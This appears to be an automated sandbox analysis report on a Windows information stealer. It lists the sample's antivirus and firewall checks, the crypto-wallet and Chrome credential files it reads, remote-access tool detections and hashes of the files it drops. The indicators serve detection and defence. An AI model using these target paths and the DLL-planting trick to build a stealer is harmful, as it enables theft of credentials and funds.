17_2_004A7114

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Electrum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: l4C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \com.liberty.jaxx
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Ethereum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Ethereum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: l8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 1wOdXavtlE.exe	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected RMS RemoteAdmin tool

Source: Yara match	File source: 00000025.00000002.570035288.00000000015DA000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.537867326.00000000015DA000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Immunity\is-4BBH3.tmp, type: DROPPED

ID:	383846
Product:	CloudBasic
Start time:	10:59:40
Start date:	08.04.2021
Sample:	1wOdXavtlE.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	a7e67e6abd539aeddbb9021d23f6f217
SHA1:	cea85a6d9e417f2b8c2b3962a1359defc096e502
SHA256:	f1849f447bfa07c3a9a9db11501a026d133541d0264424198f297f5ec70e1ff3
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Immunity\CertMgry\is-I14BP.tmp	data	456F6E206BE27F312C72160471AC50D9	5E2169F36E05D5652FF097A43315EECA06FC5927	66FDA2CF3A0AC8B5AEEFA719C9DF707E06813DCF84D73C4501B05935895616CF
C:\ProgramData\Immunity\CertMgry\is-OTUTI.tmp	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows	229EE3F6A87B33F0C6E589C0EA3CC085	6CA1CEDC91693D63AB551768B9CEC36646644895	E5FDBB5BCF182F83FD162940125176340AEF6B4E4BA43DE072CA9CEB5CF1D3B9
C:\ProgramData\Immunity\is-02I40.tmp	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5C268CA919854FC22D85F916D102EE7F	0957CF86E0334673EB45945985B5C033B412BE0E	1F4B3EFC919AF1106F348662EE9AD95AB019058FF502E3D68E1B5F7ABFF91B56
C:\ProgramData\Immunity\is-15GML.tmp	Windows Registry text (Win95 or above)	496263C0B1024F6365F1FF3C38D59969	3396118E467D3D146F66B1AE23894C24BD030295	2D719041DAA2ED97E7961A1D486E3ADBAD39523812DEAD9BF13EA50FFE47014B
C:\ProgramData\Immunity\is-1J28N.tmp	PE32 executable (DLL) (console) Intel 80386, for MS Windows	4CB2E1B9294DDAE1BF7DCAAF42B365D1	A225F53A8403D9B73D77BCBB075194520CCE5A14	A8124500CAE0ABA3411428C2C6DF2762EA11CC11C312ABED415D3F3667EB6884
C:\ProgramData\Immunity\is-2SOD7.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	C21E287031CBDFFA44CED93DAA421F0C	55153B60200428C44E5C5541EA2C93870C7A2AD0	2DCD82E61B395B70679DF7F63A843DA3FE92BE4DFD608BE3E5E5BCDFB7F8848E
C:\ProgramData\Immunity\is-3JG13.tmp	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	E59E074DEC13E9B9F64FC25D61665822	E8AA1010C0FDA21EF0B28D1BEC2F68103F0D2FA7	77408B37893683879B57E359DE3A4C1C8C21D9B910847A45039D69F8FCE5509F
C:\ProgramData\Immunity\is-4BBH3.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	43B697A1A52D948FCBEAE234C3CBD21E	D277FD70AF98600D833C04D1CF19B856C1FF3873	234799CE86ABE8ECC1F768E2B319ED43E67E53F65AE9DE1B85E44840F842CCFF
C:\ProgramData\Immunity\is-7MAR4.tmp	ASCII text, with CRLF line terminators	2F97C51DC9FA0BEF75867FFF87463BEE	B1D950C91A16D14348F7176FB9EE7BD9BAD6020D	95F7C688340BB527D98C43F0C558B936C903AFBA431B39CD24118041D5FA1169
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	EF85DB7A65E682F1F2A66308A8641E94	BBB0849EF0B1D6DC36D79158F06CD54ECAFD7B17	DB1583ADD5AB0C2337B6056014D8E69037AB145CB8A565879B2500405D0807D5
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage user DataBase, version 0x620, checksum 0x7f0a05a2, page size 16384, DirtyShutdown, Windows version 10.0	7BBFE4901D01C073D83FD449C13FB3B1	0E534B18D487E2FE65161484046DD284C922DD36	7031295556C5A86379D15B0FD6C404E6C9B36518F9F3675B62DD7AE3FA2D4152
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	7D3A1504B8FE2803A1BA2B1463A00D6D	6E6DB3E02593BBDB155B7682F405D7AF49341AE3	905596E434CE196AF8A2BADFF2FB06799C6C7FEEB7CB3AB455277CCF0E89AEC6
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Apr 8 17:01:40 2021, mtime=Thu Apr 8 17:01:40 2021, atime=Fri Jan 15 04:01:28 2021, length=365, window=hide	B9772021F14648551BC2AB9BD381B215	572F6B42A40C0A0E351DAB49F8DB7008C87C1403	24D4567E22D3CAC7B62DF573B5A02E2744CE3E67219D5A36F4B4CF6CFA6F08CD
C:\ProgramData\Remote Manipulator System\install.log	ASCII text, with CRLF line terminators	F480C049A6CC8E5B22767C3A8FF1533B	F8B31C0E3983A5BC6D49DDE3775F0590E96EAC93	1AB5598633B0AC56429B06FC331F3A7628F3F3067DB5D314A82575138745C0D9
C:\ProgramData\is-7TDOG.tmp	ASCII text, with CRLF line terminators	ACE1A6C2EA9446D1BD4B645D00BC2C46	A9C41E189775DB5A507785C1C527FF9FB7A07BD6	2B875F4D5F0722425969FD5963FA0276A101CE63DDB91E5960F2860AB0AEDBF4
C:\ProgramData\is-PFD3D.tmp	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	531FCC0848CF13FA300600DF16A71A87	20BFF8B5030D74AFBA1B4C20B5C8CC6F75011B62	5B192BBC069B8AEF74DABB1DD5459BDA8EA2A64A7336DB54E57AFB38569ECE68
C:\ProgramData\is-R3F67.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	A5E2BB848405DFC3A56FC892B691B614	7BC55828682E93191D6EE4C20E727308D0EEAC6D	EA5982C7DD3396D89D54BA0F0269B96807AB59111C22503CA5F9E593B78660F3
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1wOdXavtlE.exe.log	ASCII text, with CRLF line terminators	FED34146BF2F2FA59DCF8702FCC8232E	B03BFEA175989D989850CF06FE5E7BBF56EAA00A	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ssevs.exe.log	ASCII text, with CRLF line terminators	FED34146BF2F2FA59DCF8702FCC8232E	B03BFEA175989D989850CF06FE5E7BBF56EAA00A	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sssevs.exe.log	ASCII text, with CRLF line terminators	AA25E65111EC3A1B0F44AC48FDE28F1F	6E2DF24306122794C15C5FDAA14CE9720B58AF16	56A9B019CD9F725CC5E2BFDD3ABF2D9A4B1608902A37359C9AB97B6A6F4212B8
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{671D4562-9894-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	0922546B0873603C38340FB85524335A	6C3F26DC76E1DAC5083E7819616EC06CC3ACCB07	02D64E8EFDF6907B7750ABAE1837642982F1CB5E87F74F5A509B0CB5D9E5C37F
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{671D4564-9894-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	E6761D4DF3B338D0BC826866D71C7E56	63FCA989438567EB4F3CD5D198DC6F155CD0932D	570BDF32D888CABA3399256D8D8A90A68D350CD85B823A852E08D394F97FB54C
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6D8CBC47-9894-11EB-90E5-ECF4BB2D2496}.dat	Microsoft Word Document	3FF6E9EEAB667386F6FEF02E0562A303	A57AE4BB10E379C0C23BDBF613F4BFC494EED641	C697BF8BED5473E04D0406243E1B70613086B3243ABF5705B1793E31B4BE39AE
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\wlm7n14\imagestore.dat	data	C5DB85D450F8B776AB749484E27B92CC	8A725CFC2336D231FB5CB8320E80A7E5B5227C6E	26C3EC3AF41FF65F168E7B9DE698DC91C843C444CB8CD529B0B0625A5950AF74
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\1tMzh7[1].png	PNG image data, 1 x 1, 1-bit colormap, non-interlaced	EC6AAE2BB7D8781226EA61ADCA8F0586	D82B3BAD240F263C1B887C7C0CC4C2FF0E86DFE3	B02FFFABA9E664FF7840C82B102D6851EC0BB148CEC462CEF40999545309E599
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\1tncg7[1].png	PNG image data, 1 x 1, 1-bit colormap, non-interlaced	EC6AAE2BB7D8781226EA61ADCA8F0586	D82B3BAD240F263C1B887C7C0CC4C2FF0E86DFE3	B02FFFABA9E664FF7840C82B102D6851EC0BB148CEC462CEF40999545309E599
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\favicon[1].ico	MS Windows icon resource - 1 icon, 64x64, 32 bits/pixel	DD345AEE82D34847E8ABD2A695302336	87E2444681A0C4D9127B5328740EC8957D7972D1	377E20A354FD825B9763C87836482BB7B79D2794E6D25ED693376CA33EAC990A
C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	C1B49299EB51AFA1264D69FC022BB49B	8126DE1C2B2EC7D2DDD83735067AEF2EEFA77B37	03B49D8261ED6FBFD23C6F1233E6C7FA131FF067D059FDE696BE60105286A895
C:\Users\user\AppData\Local\Temp\is-97L06.tmp\_isetup\_setup64.tmp	PE32+ executable (console) x86-64, for MS Windows	E4211D6D009757C078A9FAC7FF4F03D4	019CD56BA687D39D12D4B13991C9A42EA6BA03DA	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
C:\Users\user\AppData\Local\Temp\is-QEDPC.tmp\_isetup\_setup64.tmp	PE32+ executable (console) x86-64, for MS Windows	E4211D6D009757C078A9FAC7FF4F03D4	019CD56BA687D39D12D4B13991C9A42EA6BA03DA	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
C:\Users\user\AppData\Local\Temp\servs.exe	PE32 executable (GUI) Intel 80386, for MS Windows	6DF7008811F88EEB253064A99C79F234	41744103D74456CB63397841EF25945CA9E553BF	4BE7DD4ECB8434B14E36F0F747EDDD8B98435E98F3D664F6206223E54D212A1A
C:\Users\user\AppData\Local\Temp\ssevs.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	17A490DB01806E788407EC152760E5B8	0C2C5AEFA29B93B288BDD4C6FB3CD7FBB7CA7458	8036D0A8DF402F04F0BB9AE59FAE4BC15929A241F38FFF602CAA01E8255EEBF0
C:\Users\user\AppData\Local\Temp\sssevs.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	7B640BAE01407187610BA076D5509628	CEFDE5C42ED155EB83A847F77E802FE2CCC858E8	FB8382F9DA53CA6DE0C6BAF0FA77AF2087A26803D2CBD87D69C2F935C049BC10
C:\Users\user\AppData\Local\Temp\tmp2837.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp2838.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp2A7.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp2A8.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp2A9.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp2AA.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp2AB.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp2AC.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp379E.tmp	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Local\Temp\tmp3B87.tmp	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Local\Temp\tmp4DB2.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp4DB3.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp4DB4.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp4DB5.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\tmp7265.tmp	ASCII text, with very long lines, with CRLF line terminators	A002E80B55673139253599B753BDC01A	6AEEF831A5AAB9155AAABB52D173859E20A86932	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
C:\Users\user\AppData\Local\Temp\tmp7266.tmp	ASCII text, with very long lines, with CRLF line terminators	E49F84B05A175C231342E6B705A24A44	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
C:\Users\user\AppData\Local\Temp\tmp7267.tmp	ASCII text, with very long lines, with CRLF line terminators	A2EF8D31A8DC8EAFB642142CAE0BDDE5	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
C:\Users\user\AppData\Local\Temp\tmp7268.tmp	ASCII text, with very long lines, with CRLF line terminators	A002E80B55673139253599B753BDC01A	6AEEF831A5AAB9155AAABB52D173859E20A86932	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
C:\Users\user\AppData\Local\Temp\tmp7269.tmp	ASCII text, with very long lines, with CRLF line terminators	E49F84B05A175C231342E6B705A24A44	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
C:\Users\user\AppData\Local\Temp\tmp726A.tmp	ASCII text, with very long lines, with CRLF line terminators	A2EF8D31A8DC8EAFB642142CAE0BDDE5	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
C:\Users\user\AppData\Local\Temp\tmp8F36.tmp	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Local\Temp\tmp8F37.tmp	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Local\Temp\tmp8F67.tmp	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Local\Temp\tmp8F68.tmp	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Local\Temp\tmpB61B.tmp	SQLite 3.x database, last written using SQLite version 3032001	EA7F9615D77815B5FFF7C15179C6C560	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
C:\Users\user\AppData\Local\Temp\tmpB61C.tmp	SQLite 3.x database, last written using SQLite version 3032001	EA7F9615D77815B5FFF7C15179C6C560	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
C:\Users\user\AppData\Local\Temp\~DF480E086DE63F524E.TMP	data	94CE90CE52C708EA8BDF131F1083E2EB	BAA21021217F656E403F8DE11471505928071324	4679AFB032B0273036A49575973E0050315FD3F907FAE091609C8BCB9D187FC0
C:\Users\user\AppData\Local\Temp\~DF7F0501A3EC2F9AAE.TMP	data	F3220772A84CE1D73341B4389212D98F	2DB31F59C4581B2D38CFD400429A9B682A236115	909109DE096E7B5B3016AE26DB74515F4FED8A1921BAA241AA714BBBA080E32B
C:\Users\user\AppData\Local\Temp\~DFB2E0A910E5D6D754.TMP	data	78C38D7A8818AEDB90F8EB2EC4AF7FD7	D452DFAFCF874C0831013DD402F6B0F52855AB7B	025050B49CBB2368374E4E315676A7ADD6EDC46CAC378A3CFDC0111BCD4938FE
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide	5F6F67CEA31AA670A64C5F89FDABC1FB	A51546AF6778A3C6EF970A55ADB53BABABEF191D	6E2080A3863C760652C65B7537365A4B555BD2D41F22C6177082D9A9AE5C610C
C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	PE32+ executable (GUI) x86-64, for MS Windows	F0C8675F98E397383A112CC8ED5B97DA	644A87D9CEE0BC576402573224F6695AA45196D3	0E9C85E4833BB1BF45CB66AA3B021A2CDA6074333C2217F8FFB5360B63719374
C:\Windows \System32\uxtheme.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	531FCC0848CF13FA300600DF16A71A87	20BFF8B5030D74AFBA1B4C20B5C8CC6F75011B62	5B192BBC069B8AEF74DABB1DD5459BDA8EA2A64A7336DB54E57AFB38569ECE68
\Device\ConDrv	ASCII text, with CRLF line terminators	E3AC0178A28CF8E44D82A62FAE2290D7	C0F1C66E831ADD5EA81B19BFA0E85D1D2CA192BA	2C61108AC0158F555B0632F5658D79D502B0929F2090848A7DEB77158667D43C

Analysis Report 1wOdXavtlE.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs